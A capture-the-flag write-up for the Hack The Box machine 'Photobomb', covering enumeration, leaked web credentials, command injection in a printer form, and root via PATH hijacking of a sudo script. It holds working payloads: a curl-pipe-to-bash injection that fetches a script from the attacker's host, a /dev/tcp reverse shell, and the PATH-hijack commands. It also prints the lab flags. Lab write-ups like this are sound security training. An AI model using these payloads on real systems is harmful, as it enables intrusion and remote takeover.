HTB Photobomb done
Photobomb
Notes
OS:
Linux
Technology:
IP Address:
10.129.228.60
Open ports:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
Users and pass:
From http://photobomb.htb/photobomb.js
L: pH0t0
P: b0Mb!
Nmap
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Photobomb]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.228.60_nmap 10.129.228.60 ; cat 10.129.228.60_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-17 13:45 CEST
Nmap scan report for 10.129.228.60
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
| 256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_ 256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Add IP to /etc/hosts
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Photobomb]
└─$ cat /etc/hosts | tail -n1
10.129.228.60 photobomb.htb
Ffuz: http://photobomb.htb
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Photobomb]
└─$ ffuf -u http://photobomb.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o photobomb.htb_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://photobomb.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md .git
:: Output file : photobomb.htb_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
favicon.ico [Status: 200, Size: 10990, Words: 11, Lines: 3, Duration: 91ms]
printer.txt [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 44ms]
printer.bac [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 44ms]
printer.html [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 44ms]
printer.php [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 45ms]
printer.git [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 34ms]
printer.backup [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 38ms]
printer-friendly.html [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 44ms]
printer [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 59ms]
printer_friendly.php [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 43ms]
printer-friendly.php [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 44ms]
printer-friendly.md [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 44ms]
printer_friendly [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 44ms]
printer-friendly.git [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 44ms]
printer-friendly.backup [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 44ms]
printer-friendly.bac [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 44ms]
printer-friendly.txt [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 44ms]
printer_friendly.html [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 43ms]
printer-friendly [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 45ms]
printer.md [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 50ms]
printer_friendly.txt [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 43ms]
printer_friendly.bac [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 55ms]
printerfriendly.php [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 49ms]
printerfriendly.txt [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 45ms]
printer_friendly.backup [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 53ms]
printerfriendly [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 49ms]
printerfriendly.bac [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 44ms]
printers.php [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 37ms]
printerfriendly.git [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 38ms]
printerfriendly.backup [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 38ms]
printers [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 32ms]
printerfriendly.md [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 38ms]
printer_friendly.git [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 53ms]
printer_friendly.md [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 54ms]
printerfriendly.html [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 45ms]
printers.txt [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 34ms]
printers.bac [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 32ms]
printers.html [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 34ms]
printers.backup [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 33ms]
printers.git [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 33ms]
printers.md [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 34ms]
:: Progress: [163752/163752] :: Job [1/1] :: 662 req/sec :: Duration: [0:04:22] :: Errors: 0 ::
Open website: http://photobomb.htb/
nothing interesting here
http://photobomb.htb/
Ffuz subdomain: http://photobomb.htb
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Photobomb]
└─$ ffuf -u http://photobomb.htb -H "Host: FUZZ.photobomb.htb" -w /usr/share/wordlists/dirb/big.txt -o photobomb.htb_ffuz_subdomain | grep -v 154
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://photobomb.htb
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Header : Host: FUZZ.photobomb.htb
:: Output file : photobomb.htb_ffuz_subdomain
:: File format : json
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
:: Progress: [20469/20469] :: Job [1/1] :: 431 req/sec :: Duration: [0:00:23] :: Errors: 0 ::
Read javascript code: http://photobomb.htb/photobomb.js
I found creds:
L: pH0t0
P: b0Mb!
---
view-source:http://photobomb.htb/photobomb.js
---
function init() {
// Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:[email protected]/printer');
}
}
window.onload = init;
Open website: http://pH0t0:[email protected]/printer
http://photobomb.htb/printer
Command injection
Checking location command injection
Command injection in: filetype=jpg;sleep%205
---
POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: keep-alive
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1
Priority: u=0, i
photo=andrea-de-santis-uCFuP0Gc_MM-unsplash.jpg&filetype=jpg&dimensions=3000x2000;sleep%205
---
POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: keep-alive
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1
Priority: u=0, i
photo=andrea-de-santis-uCFuP0Gc_MM-unsplash.jpg&filetype=jpg;sleep%205&dimensions=3000x2000
Create revshell
1)
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Photobomb]
└─$ cat revshell.sh
bash -c 'exec bash -i &>/dev/tcp/10.10.14.48/80 <&1'
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Photobomb]
└─$ python3 -m http.server 4000
Serving HTTP on 0.0.0.0 port 4000 (http://0.0.0.0:4000/) ...
10.129.228.60 - - [18/Apr/2025 21:50:53] "GET /revshell.sh HTTP/1.1" 200 -
---
2)
POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: keep-alive
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1
Priority: u=0, i
photo=andrea-de-santis-uCFuP0Gc_MM-unsplash.jpg&filetype=jpg;curl+10.10.14.48:4000/revshell.sh|bash&dimensions=3000x2000
---
3)
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Photobomb]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.48] from (UNKNOWN) [10.129.228.60] 58472
bash: cannot set terminal process group (692): Inappropriate ioctl for device
bash: no job control in this shell
wizard@photobomb:~/photobomb$
wizard@photobomb:~/photobomb$
Read flag: user.txt
wizard@photobomb:~/photobomb$ find / -name "user.txt" 2>/dev/null
/home/wizard/user.txt
wizard@photobomb:~/photobomb$
wizard@photobomb:~/photobomb$ cat /home/wizard/user.txt
e817c807d211c9b9ab2ded31a3827b66
Privilege Escalation
Read sudoers
izard@photobomb:~$ sudo -l
Matching Defaults entries for wizard on photobomb:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wizard may run the following commands on photobomb:
(root) SETENV: NOPASSWD: /opt/cleanup.sh
wizard@photobomb:~$ cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
Path Hijacking
wizard@photobomb:~$ echo -e '#!/bin/bash\n\nbash' > /tmp/find
wizard@photobomb:~$ chmod a+x /tmp/find
wizard@photobomb:~$ cd /tmp/
wizard@photobomb:/tmp$ sudo PATH=$PWD:$PATH /opt/cleanup.sh
Read flag: root.txt
root@photobomb:/home/wizard/photobomb# id
uid=0(root) gid=0(root) groups=0(root)
root@photobomb:/home/wizard/photobomb# cd /tmp/
root@photobomb:~# cd /root
root@photobomb:~# ls -a
. .. .bash_history .bashrc .cache .local .profile root.txt .ssh
root@photobomb:~#
root@photobomb:~# cat root.txt
2ded111442d3f17b39dacbab7c0572ec
root@photobomb:~#
References
Lessons Learned